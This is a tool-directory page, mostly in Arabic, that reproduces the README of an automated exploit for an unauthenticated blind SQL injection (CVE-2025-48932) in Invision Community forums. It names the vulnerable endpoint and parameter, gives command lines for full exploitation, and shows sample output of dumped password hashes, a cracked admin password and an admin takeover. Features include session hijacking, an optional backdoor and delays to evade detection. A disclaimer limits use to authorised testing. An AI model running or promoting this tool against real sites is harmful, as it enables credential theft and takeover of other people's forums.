Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna

GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

عرض المستودع
1منذ 18 أياملم تتم المراجعة بعد
مشاركة

🔓 CVE-2025-48932 - استغلال حقن SQL في Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ نظرة عامة على الثغرة الحرجة

CVE-2025-48932 هي ثغرة حقن SQL أعمى حرجة بدون مصادقة تم اكتشافها في Invision Community الإصدارات ≤ 4.7.20. يسمح هذا الاستغلال للمهاجمين عن بُعد بما يلي:

  • 🔍 استخراج معلومات حساسة من قاعدة البيانات
  • 👤 سرقة بيانات اعتماد المستخدمين وتجزئات كلمات المرور
  • 🔑 الاستيلاء على حسابات المسؤولين
  • 🎯 اختطاف جلسات المستخدمين النشطة
  • 💻 تحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر الاستيلاء على حساب المسؤول
  • 📊 تفريغ محتويات قاعدة البيانات بالكامل

🎯 الميزات


📊 العرض التوضيحي ولقطات الشاشة

تنفيذ الاستغلال

root@kitploit:~
$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

نموذج مخرجات JSON

root@kitploit:~
{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 دليل البدء السريع

التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

الاستخدام الأساسي

root@kitploit:~
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

الاستخدام المتقدم

root@kitploit:~
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 المتطلبات

متطلبات النظام

  • Python: 3.6 أو أحدث
  • نظام التشغيل: Linux وWindows وmacOS (أي نظام تشغيل يدعم Python)
  • الذاكرة: ضئيلة (~50 ميجابايت رام)
  • التخزين: ~100 كيلوبايت (الاستغلال فقط)

التبعيات

root@kitploit:~
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

اختياري (لكسر كلمات المرور)

  • قائمة الكلمات: rockyou.txt أو أي قائمة كلمات مخصصة
    root@kitploit:~
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ التفاصيل التقنية

موقع الثغرة

  • الملف: /applications/calendar/modules/front/calendar/view.php
  • الدالة: IPS\calendar\modules\front\calendar\view::search()
  • المعامل: location (مدخلات يقدمها المستخدم)
  • النوع: حقن SQL أعمى قائم على الاستجابة المنطقية (Boolean-based Blind SQL Injection)

ناقل الهجوم

root@kitploit:~
GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

سلسلة الاستغلال

  1. الاكتشاف: كشف الحقن القائم على الاستجابة المنطقية
  2. التعداد: استخراج بنية قاعدة البيانات
  3. الاستخراج: تفريغ البيانات الحساسة
  4. سرقة بيانات الاعتماد: استخراج بيانات اعتماد المستخدمين
  5. تصعيد الامتيازات: الاستيلاء على حساب المسؤول
  6. اختطاف الجلسات: سرقة الجلسات النشطة
  7. الثبات: إنشاء باب خلفي (اختياري)

إصدارات قواعد البيانات المدعومة

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 إشعار الأمان والقانون

⚠️ إخلاء مسؤولية هام

هذه الأداة لأغراض تعليمية واختبارية مصرّح بها فقط.

باستخدامك لهذه الأداة، فإنك توافق على:

  • استخدامها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها
  • عدم استخدامها لأغراض غير قانونية أو ضارة
  • الامتثال لجميع القوانين واللوائح المعمول بها
  • تحمل المسؤولية الكاملة عن أفعالك

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي.

الإفصاح المسؤول

  • البائع: Invision Community
  • تاريخ الإفصاح: 16 مايو 2025
  • تم التصحيح: الإصدار 4.7.21 (27 مايو 2025)
  • CVE: تم تعيين CVE-2025-48932

📚 التوثيق

وسائط الاستغلال

بنية التقرير

root@kitploit:~
invision_exploit_report_[timestamp].json
├── target                 # Target URL
├── timestamp              # Exploit timestamp
├── vulnerable             # Vulnerability status
├── database               # Database information
├── databases              # List of databases
├── tables                 # List of tables
├── credentials            # Extracted credentials
├── admin_info             # Admin user information
└── summary                # Exploitation summary

🎯 حالات الاستخدام

للباحثين في الأمان

  • ✅ التحقق من الثغرات
  • ✅ تطوير إثبات المفهوم
  • ✅ تقييم الأمان
  • ✅ صيد مكافآت الثغرات (Bug Bounty)

لخبراء اختبار الاختراق

  • ✅ اختبار الاختراق الخارجي/الداخلي
  • ✅ عمليات الفريق الأحمر
  • ✅ التحقق من الثغرات
  • ✅ اختبار الامتثال

لمسؤولي الأنظمة

  • ✅ التدقيق الأمني للأنظمة الخاصة
  • ✅ التحقق من التصحيحات
  • ✅ التحقيق في الاستجابة للحوادث
  • ✅ تقييم الوضع الأمني

🐛 استكشاف الأخطاء وإصلاحها

المشكلات الشائعة والحلول

المشكلة: انتهاء مهلة الاتصال

root@kitploit:~
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60

المشكلة: أخطاء شهادة SSL

root@kitploit:~
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl

المشكلة: تم اكتشاف تحديد المعدل

root@kitploit:~
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2

المشكلة: لم يتم العثور على معامل قابل للاستغلال

root@kitploit:~
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists

📖 المراجع

الموارد الرسمية

  • CVE-2025-48932
  • Invision Community
  • النشرة الأمنية لـ Invision
  • الإشعار الأصلي

المراجع التقنية

  • حقن SQL - OWASP
  • حقن SQL الأعمى
  • توثيق MySQL

ثغرات CVE ذات الصلة

  • CVE-2024-xxxxx (ثغرات Invision السابقة)
  • CVE-2023-xxxxx (ثغرات CVE ذات صلة بمنصات المجتمع)

🤝 المساهمة

نرحب بالمساهمات! يرجى الاطلاع على إرشادات المساهمة.

كيفية المساهمة

  1. انسخ (Fork) المستودع
  2. أنشئ فرع ميزة (git checkout -b feature/AmazingFeature)
  3. نفّذ التغييرات (git commit -m 'Add some AmazingFeature')
  4. ادفع إلى الفرع (git push origin feature/AmazingFeature)
  5. افتح طلب سحب (Pull Request)

الإبلاغ عن المشكلات

  • 🐛 الإبلاغ عن خطأ
  • 💡 طلب ميزة
  • 🔒 مشكلة أمنية

👨‍💻 المؤلف

Sudeepa Wanigarathna

باحث أمني وصياد مكافآت الثغرات (Bug Bounty)

  • 🌐 GitHub
  • 🐦 Twitter
  • 💼 LinkedIn
  • 📧 البريد الإلكتروني

📄 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ أظهر دعمك

إذا كان هذا المشروع قد ساعدك أو وجدته مثيرًا للاهتمام:

  • ⭐ أضف نجمة (Star) لهذا المستودع
  • 🔗 شارك مع شبكتك
  • 📢 اذكره في أبحاثك الأمنية
  • 🤝 ساهم في تحسينه

🙏 الشكر والتقدير

Sudeepa Wanigarathna

باحث في الأمن السيبراني | مهندس برمجيات | مهندس CTF

هذا المشروع مقدم لأغراض البحث الأمني والتحليل الدفاعي واختبار الاختراق المصرح به. يتحمل المستخدمون مسؤولية الامتثال لجميع القوانين المعمول بها والحصول على التصريح المناسب قبل الاستخدام.

تنزيل الأداة
الميزةالوصفالحالة
🚀 بدون أي تبعياتمكتبة Python القياسية فقط - لا حاجة للتثبيت عبر pip✅
⚡ متعدد الخيوطاستخراج بيانات فائق السرعة مع خيوط قابلة للتهيئة✅
🤖 آلي بالكاملسلسلة استغلال كاملة من الاكتشاف إلى إعداد التقارير✅
👑 الاستيلاء على حساب المسؤولاختطاف الجلسات وتصعيد الامتيازات✅
🔑 تفريغ بيانات الاعتماداستخراج المستخدمين وتجزئات كلمات المرور والبريد الإلكتروني✅
🔓 كسر كلمات المروركسر تجزئات مدمج مع دعم قوائم الكلمات✅
📋 تقارير JSONمخرجات منظمة للتحليل والتوثيق✅
🔌 دعم البروكسيتكامل مع Burp Suite والبروكسيات المخصصة✅
🎨 مخرجات ملونةمخرجات طرفية جميلة مع مؤشرات التقدم✅
🛡️ تحديد المعدلتأخيرات مدمجة لتجنب الاكتشاف✅
الوسيطةالوصفمثال
-u, --urlرابط الهدف (مطلوب)-u https://example.com
-p, --proxyرابط البروكسي-p http://127.0.0.1:8080
-t, --threadsعدد الخيوط (الافتراضي: 5)-t 10
-o, --outputملف الإخراج للنتائج-o results.json
-v, --verboseتفعيل المخرجات المفصلة-v
--check-onlyفحص الثغرة فقط--check-only
--dump-allتفريغ جميع البيانات المتاحة--dump-all
--wordlistملف قائمة الكلمات للكسر--wordlist rockyou.txt